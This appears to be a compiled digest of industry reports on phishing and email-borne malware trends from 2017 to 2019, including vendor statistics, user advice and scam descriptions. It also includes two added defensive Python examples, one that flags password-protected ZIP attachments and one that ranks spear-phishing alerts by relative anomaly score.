- Phishing is a global billion-dollar industry. The study showed that over a three-month period, mobile phishing accounted for 35% of all blocks triggered for customers using the telecom operator's security service. Adware took second place with 34%, ahead of blocks of malware, ransomware and cryptojacking.
Service providers have the ability to reduce the number of phishing attacks.
- Despite the fact that phishing technically depends on which sources users trust, service providers can proactively protect their subscribers from phishing.
- Service providers should adopt the "Train, warn and protect" approach to protect customers from cybercriminals.
- Phishing protection provides service providers with the opportunity to differentiate themselves and create sources of income, while protecting Internet users.
Over the years, customers of service providers have become direct or indirect victims of phishing, and now is the time to act. As of July 2019, hackers seek to deceive users and convince them to divulge personal and confidential information, skillfully manipulating such human emotions as greed, fear and hope. Thanks to the proactive approach of notifying customers about phishing campaigns, training them on the basics of Internet security and the introduction of anti-phishing technologies for protection at the network level, service providers can not only gain consumer confidence, but also create additional sources of income for themselves, said Hagai Katz, vice president of strategic cybersecurity accounts at Allot.
2018
Email is the most popular way to deliver malware
According to CERT-GIB, in 2018 e-mail firmly established itself as the most popular method of delivering malicious software. The ratio of malware delivery by email to download through a web browser remained at 12 to 1 throughout 2018. At the same time, in the second half of 2018, the share of malware downloads through a web browser decreased to a historical minimum and amounted to about 3%.
According to CERT-GIB, one of the key trends in 2018 was the use of public mail services to send letters containing malware. The top 5 mail domains most actively used by attackers included mail.ru, yandex.ru and gmail.com, which are popular in Russia. For comparison, in 2017 only one public mail service (mail.ru) was in the top five; the remaining four were domains registered specifically for malicious mailings or simply fake addresses. The trend is easily explained: on the one hand, the authors of phishing mailings strive to use the most trusted addresses - those from which users are used to receiving e-mail. On the other hand, this method of sending is much cheaper - there is no need to register a mail domain, a ready-made infrastructure can be used, and if one mail service detects suspicious activity, the sender can "move" to another without loss.
As in 2017, in 2018 attackers in the vast majority of cases (82%) preferred to deliver malware as an attachment to the letter. The number of cases in which letters contained URL links leading to a malware download did not increase significantly in 2018 - by 10%.
Archives became the favorite format for packaging malware in 2018. Throughout 2018, more than half of all malicious objects were delivered in archives. ZIP archives were the most popular; as a rule, they do not require separate software to unpack. They accounted for 20% of all malicious files analyzed as part of the work of CERT-GIB.
In 2018, files with the .exe extension were still popular among intruders, despite the fact that Internet users should by now have learned to treat this executable format with caution. Files with the .exe extension accounted for 12% of all malicious objects analyzed.
To bypass traditional malware detection systems, attackers resort to various tricks, one of which is sending malware in archives that require a password to decrypt the content. CERT-GIB recorded a tenfold increase in the number of such archives: in 2017, archives with a password accounted for only 0.08% of the total number of malicious objects, and in 2018 their share grew to 0.9%. In simple attack schemes, the password is usually given in the letter carrying the malicious attachment. Multi-stage attacks that use social engineering hand over the password during communication with the user, in order to build a relationship of trust whose purpose is to make the victim open the archive with malware.
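What a mail gateway can still learn from such an archive without the password is shown in the added example below; it is not code from CERT-GIB or from the original article. The sample archives are constructed in memory, and the extension list and the "hold"/"deliver" verdicts are assumptions standing in for local policy.

```python
import io
import re
import zipfile

ENCRYPTED_BIT = 0x1  # general-purpose flag bit 0 of a ZIP entry: content is encrypted
RISKY_EXTENSIONS = (".exe", ".scr", ".js", ".vbs")  # assumption: local policy list
PASSWORD_HINT = re.compile(r"\bpassword\b", re.IGNORECASE)


def make_sample_zip(member_name, encrypted):
    """Build a constructed ZIP in memory; optionally mark its entry as encrypted.

    Only the header flag is set (the payload is placeholder text), which is
    what a scanner without the password gets to see anyway.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(member_name, "constructed placeholder content")
    data = bytearray(buf.getvalue())
    if encrypted:
        local = data.find(b"PK\x03\x04")    # local file header, flags at offset 6
        central = data.find(b"PK\x01\x02")  # central directory header, flags at offset 8
        data[local + 6] |= ENCRYPTED_BIT
        data[central + 8] |= ENCRYPTED_BIT
    return bytes(data)


def inspect_attachment(data, body_text):
    """Return what can be determined about an attachment without its password."""
    result = {"is_zip": False, "encrypted": [], "risky_names": [],
              "password_in_body": False, "verdict": "deliver", "reasons": []}
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return result
    result["is_zip"] = True
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            # With the common ZIP encryption schemes the entry names stay
            # readable even though the content is not.
            if info.flag_bits & ENCRYPTED_BIT:
                result["encrypted"].append(info.filename)
            if info.filename.lower().endswith(RISKY_EXTENSIONS):
                result["risky_names"].append(info.filename)
    result["password_in_body"] = bool(PASSWORD_HINT.search(body_text))
    if result["encrypted"]:
        result["reasons"].append("content cannot be scanned: encrypted entries")
        if result["password_in_body"]:
            result["reasons"].append("letter body supplies a password")
    if result["risky_names"]:
        result["reasons"].append("executable file name inside archive")
    if result["reasons"]:
        result["verdict"] = "hold"
    return result
```

An encrypted archive with no password in the body is still held: that matches the multi-stage scheme, where the password arrives later in the conversation.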
Another known method of bypassing traditional detection systems is to send malicious links with deferred activation. Throughout 2018, CERT-GIB recorded slightly differing scenarios of targeted attacks in which letters were delivered to addressees outside working hours, and at the time of the anti-virus check the link from the letter was unavailable, so the malicious letter was successfully delivered. Attackers activated the malicious link only during the victim's working hours, when the anti-virus scanner had already "allowed" the delivery of the letter.
"More and more cybercriminals have tools to make sure that the copy being sent is not detected by popular traditional anti-virus tools. But the protection class, based on behavioral analysis, allows you to detect behavior, previously unknown instances of malware and block suspicious activity that antivirus can miss," noted Yaroslav Kargalev, Deputy Head of CERT-GIB.
49% of phishing sites use SSL to create the illusion of security
According to CERT-GIB, the ratio of phishing resources using a secure connection (SSL/TLS) to the total number of phishing sites shows that attackers are increasingly exploiting the false sense of security of users who rely on HTTPS. Statistics show that in the 4th quarter of 2018, almost half of all phishing resources used a "secure connection."
"Users should not rely on the type of connection the site uses as its security criteria. Getting an HTTPS certificate for attackers has become as easy as any other. Online, you can find a large number of services that allow you to do this quickly and for free," noted Yaroslav Kargalev, Deputy Head of CERT-GIB.
Kaspersky Lab blocked 137 million attempts by users to go to phishing pages
On November 6, 2018, Kaspersky Lab announced that its solutions blocked more than 137 million attempts by users to go to phishing pages in the third quarter of 2018 - 28% more than in the previous period. At the same time, over a third of phishing attacks (35%) targeted organizations in the financial category: banks, payment systems, online stores. All these numerous fake pages were created with one goal - to obtain confidential user data that would give the attackers, among other things, access to victims' private wallets and bank accounts.
However, cybercriminals also tried to make money on users in a different way. At the end of the summer of 2018, Kaspersky Lab recorded a surge of fraudulent mailings in spam traffic in which recipients were asked to pay a ransom for not disclosing "compromising material" collected on them. These letters even contained personal data of users - in this way, the attackers tried to convince the victims that they really had important information. The ransom was demanded in bitcoins, and its amount ranged from several hundred to thousands of dollars, while in different mailings scammers indicated different bitcoin wallets for transferring money. As Kaspersky Lab analysts found out, 17 transactions totalling about 18 thousand US dollars were made to just one such wallet in one month.
In Russia, fraudsters, of course, tried to use in their interests one of the hottest topics of recent months - pension reform. For example, Kaspersky Lab discovered several mailings with offers to check the amount of pension savings in non-state funds and withdraw money "from retirement." To convince recipients of the legitimacy of letters, attackers referred to non-existent laws and structures (for example, a certain "National Department for the Return of Pension Savings"). For the withdrawal of non-existent savings and "access" to the database with pension accruals, the recipients of the letters were asked to pay a small "duty," which, of course, went into the pocket of fraudsters.
Phishing volumes continue to grow throughout 2018, and at a rather rapid pace. The number of attacks that we recorded only in the third quarter of 2018 was half (and even more) of the value that we discovered in 2017. Many factors contribute to this. Fraudsters constantly invent schemes and tricks, borrow ideas from foreign "colleagues," use various channels for spreading spam and phishing links, and exploit popular topics and events as bait. In general, attackers clearly have no shortage of reasons and tools.
In order not to become a victim of phishing, Kaspersky Lab recommends that users adhere to fairly simple rules.
- Always verify the authenticity of the address of the sender of the letter and the links contained in it - if you are not sure of their reliability, do not open. If you still find yourself on a site that raises doubts, do not leave any personal data there. If you think that you could randomly pass your password to attackers, change it urgently.
- Use a secure connection, especially when you visit important sites (for example, the Internet banking system). Avoid unsafe public Wi-Fi networks whenever possible. All this will reduce the risk of landing on a phishing page without noticing it. For maximum confidence, use special network connection security solutions such as Kaspersky Secure Connection.
- Use the right protection solution with anti-phishing technologies - for example, Kaspersky Security Cloud. The program will warn you if you try to go to a fraudulent page and block it.
ICO boom stimulates new wave of phishing attacks
According to a Qrator Labs study, companies in the financial sector most often face phishing (30%) and DDoS attacks (26%). The banking sector's continued high level of attention to DDoS attacks is due to a wave of massive DDoS attacks on a number of large Russian banks: in 2016, the websites of many well-known financial organizations from the top 10 were attacked, and on January 28, 2018, the largest DDoS attack on the global financial sector in recent years, using the Mirai botnet, took place.
"Over the past year, almost half of respondents have experienced at least one DDoS attack. Among the main reasons leading to the financial organization falling into the focus of the organizers of DDoS attacks are the size of the organization and its popularity in the market, as well as the lack of adequate countermeasures introduced to combat DDoS attacks, as a result of which the organization can become easy prey for cybercriminals," said Artem Gavrichenkov, technical director of Qrator Labs.
According to a Qrator Labs survey, if previously financial institutions sought to build solutions entirely in-house, today most of the surveyed companies (68%) already consider hybrid solutions to be the most effective means of counteracting DDoS (on the client side with the participation of an operator solution, or a distributed network). However, this method also has a number of nuances that need to be taken into account. Hybrid solutions do not compensate for each other's disadvantages, but combine advantages and negative properties in various proportions, which can negatively affect the level of protection.
"The industry has not yet developed a clear understanding of such risks: many still rely on hybrid solutions. However, with the growth of threats, we can expect that in the future the market will take this situation more seriously, realizing that combined systems cannot provide protection from entire classes of attacks," says Artem Gavrichenkov.
The threat of phishing has increased significantly, including in connection with companies entering the ICO. The relentless excitement surrounding ICOs has led to a high risk of fraud, and average users have no accurate idea how to provide their own protection, and tend to overlook Internet fraud.
"In the ICO sector, phishing has become a serious problem, and this allows us to judge that in related industries, for example, in the financial sector, the focus of attackers also shifts towards such a method of gaining access to confidential user data," said Qrator Labs technical director.
The average number of attacks on web applications in the financial sector, according to Wallarm, is 1,500 per day. Most of them come from automated tools and scanners. This activity of automated tools creates a large amount of background noise and complicates the detection of real incidents. Although the number of hacks per unit of time has on the whole remained at the same level in recent years, financial institutions are no longer always able to detect and accurately record such incidents in a timely manner.
Cyber bullies send phishing letters under the guise of the 2018 World Cup standings
Check Point Software Technologies, a provider of cybersecurity solutions, on June 19, 2018 announced the identification of a phishing campaign related to the start of the 2018 World Cup. Cyber bullies send an infected file under the guise of a game schedule and standings.
The attachment of the phishing letters hides malware called "DownloaderGuide," known as a loader of potentially unwanted programs. Most often, it is used as an installer of applications such as toolbars, advertising software or optimization utilities. Check Point researchers found that the phishing campaign includes various executables, all of which were emailed with the subject: "World_Cup_2018_Schedule_and_Scoresheet_V1.##_CB-DL-Manager".
The campaign was first discovered on May 30, 2018 and peaked on June 5, but around the tenth of June, Check Point researchers recorded another surge, which is associated with the start of the tournament.
The company expects new spikes in online fraud and phishing attacks during the 2018 World Cup and urges Internet users to remain vigilant, and organizations are advised to apply a multi-level security strategy that protects against both known malware and zero-day threats.
Phishing is one of the most serious threats to Office 365 users
In April 2018, Microsoft published the Security Intelligence Report on information security threats for the period from February 2017. It is based on data obtained by the company's protective programs and services (data on the number of detected threats, not on cases of infection). The information was provided by corporate and private users who agreed to share it along with their geolocation.
The widespread use of botnets and ransomware viruses led to the fact that the number of devices in Russia that faced cyber threats between February 2017 and January 2018 reached 25-30% on average per month, while the same figure in the first quarter of 2017 was almost half as much - 15%. The highest rates were recorded in Pakistan, Nepal, Bangladesh and Ukraine (33.2% or higher), the lowest in Finland, Denmark, Ireland and the USA (11.4% or lower).
In 2017, methods aimed at "easy prey," such as phishing, were used to obtain credentials and other confidential information from users. According to Microsoft Advanced Threat Protection (ATP), phishing was among the most serious threats in the mailboxes of Office 365 users in the second half of 2017 (53%); 180-200 million phishing letters were detected monthly. In Russia, in particular, 7.01 phishing sites were discovered for each 1000 hosts (in the world - 5.85). The next most common threats were malware loaders (29%) and Java backdoors (11%).
Cloud applications with low security are another target for attackers. The study found that 79% of SaaS applications for cloud storage and 86% of SaaS applications for collaboration do not provide encryption of either stored or transmitted information. To protect your enterprise infrastructure, organizations must restrict users from using cloud applications that do not use encryption and control this using the Cloud Access Security Broker (CASB).
Another trend in the second half of 2017 is that cybercriminals use legitimate built-in system tools to distribute an infected document (for example, a Microsoft Office document) contained in a phishing letter and to download ransomware. The best way to avoid this kind of threat is to update the operating system and software in a timely manner.
2017
Google: Phishing attacks are more dangerous than keyloggers and data leaks
Google specialists, together with scientists from the University of California at Berkeley and the International Computer Science Institute, published the results of a study of modern cyber threats. According to the report, phishing attacks pose a more serious danger to users than keyloggers and Google password reuse[18][19].
Researchers came to this conclusion by analyzing several black markets for the sale of accounts and credentials. The study looked at data for the period from March 2016 to March 2017.
Experts found more than 788 thousand credentials stolen using keyloggers, 12.4 million credentials stolen through phishing, and 1.9 billion credentials that ended up online as a result of leaks. At the same time, 12% of accounts compromised during leaks were registered through the Gmail service. In 7% of cases, users reused their Google password to access another account, thus endangering both accounts.
According to Google representatives, from 12% to 25% of the detected passwords were still used by users. Google said that the results of the study will be used, among other things, to reset passwords in compromised accounts.
"In assessing the risks, we found that phishing poses the greatest threat to users. This is followed by keyloggers and data breaches. The probability that the phishing victim's account will be hacked is 400 times greater than for the average Google user. This figure is 10 times less for victims of data leaks and about 40 times less for victims of keyloggers," experts said.
In addition, the researchers drew attention to the growing tendency for keyloggers and phishing software to include tools that record IP addresses and other data in order to bypass geolocation filters. More sophisticated malware variants also record phone numbers and user-agent data.
Facebook will pay $100,000 to researchers for the development of targeted phishing detection technology
In August 2017, the social network Facebook announced the winner of the 2017 Internet Defense Prize contest. A team of researchers from the University of California, Berkeley, and Lawrence Berkeley National Laboratory earned a $100,000 reward for inventing a new technique for detecting targeted phishing attacks (spear-phishing) in a corporate environment.
The method, presented at the USENIX Security Symposium, combines a new anomaly scoring technique for ranking security alerts with features for analyzing targeted phishing emails.
To test their method, the researchers analyzed more than 370 million email messages received by employees of large companies between March 2013 and January 2017.
The first stage of detecting targeted phishing relies on analyzing two main components: domain reputation and sender reputation. Domain reputation is assessed by checking the reputation of the link in the email. A link is considered dangerous if few of the company's employees have visited it, or if activity on the link began very recently.
The sender reputation check tries to determine whether email fields such as the sender's name and the From header are forged.
After the analysis, the system must decide, based on the collected data, whether to raise an alert. The system proposed by the researchers is called Directed Anomaly Scoring (DAS). It works by determining how suspicious each event is relative to other events. After analyzing all events, DAS selects the highest-rated events and reports them to the security team.
According to experts, the new technology is able to detect 17 of 19 phishing emails, and the number of false positives is only 0.005%.[20]
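The relative scoring described above, as an added Python example (not the researchers' code): each event is scored by how many other events it is at least as suspicious as in every feature, and the top-scoring events within an alert budget are reported. The three feature names, the budget and the sample events are assumptions constructed for illustration.

```python
from typing import NamedTuple

class Event(NamedTuple):
    """One click on an emailed link. Field names are assumptions for this example."""
    msg_id: str
    domain_visitors: int    # employees who visited the link's domain before
    domain_age_days: int    # days since activity on the link's domain was first seen
    sender_seen_days: int   # days this display name / From address pair was seen before

# Lower values are more suspicious in every dimension.
FEATURES = ("domain_visitors", "domain_age_days", "sender_seen_days")

# Constructed sample events, not data from the study.
EVENTS = [
    Event("m1", 5000, 900, 300),
    Event("m2", 1200, 400, 45),
    Event("m3", 0, 0, 0),
    Event("m4", 2, 1, 0),
    Event("m5", 0, 700, 200),
    Event("m6", 3000, 2, 120),
]

def as_suspicious(a: Event, b: Event) -> bool:
    """True if a is at least as suspicious as b in every feature dimension."""
    return all(getattr(a, f) <= getattr(b, f) for f in FEATURES)

def das_scores(events):
    """Score each event by the number of other events it is at least as suspicious as."""
    return {
        e.msg_id: sum(1 for o in events if o is not e and as_suspicious(e, o))
        for e in events
    }

def top_alerts(events, budget):
    """Return the `budget` highest-scoring events as (msg_id, score) pairs."""
    scores = das_scores(events)
    ranked = sorted(events, key=lambda e: scores[e.msg_id], reverse=True)
    return [(e.msg_id, scores[e.msg_id]) for e in ranked[:budget]]

if __name__ == "__main__":
    for msg_id, score in top_alerts(EVENTS, budget=2):
        print(msg_id, score)
```

Event m5 has a never-visited domain but an old domain and a well-known sender, so it scores low: an event ranks high only when it is suspicious in all dimensions at once, which is what keeps the alert volume small without hand-tuned thresholds or weights.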
Fraudsters attack users of Apple devices under the guise of iTunes employees
On July 17, ESET warned users of Apple products about a new scam. Fraudsters collect bank card data and other personal information by sending emails about a non-existent purchase in the iTunes Store.
A potential victim receives an email from an online store stating that their Apple ID was used on an unknown device to buy Rihanna's album. The user is invited to ignore the message, thereby confirming the purchase, or to cancel the transaction by clicking on the link.
If the user does not notice the grammatical errors in the email and the fact that the sender's address is not related to Apple, he is taken to a phishing site, where he is invited to enter an Apple ID and password, and then to fill out a questionnaire "to confirm his identity."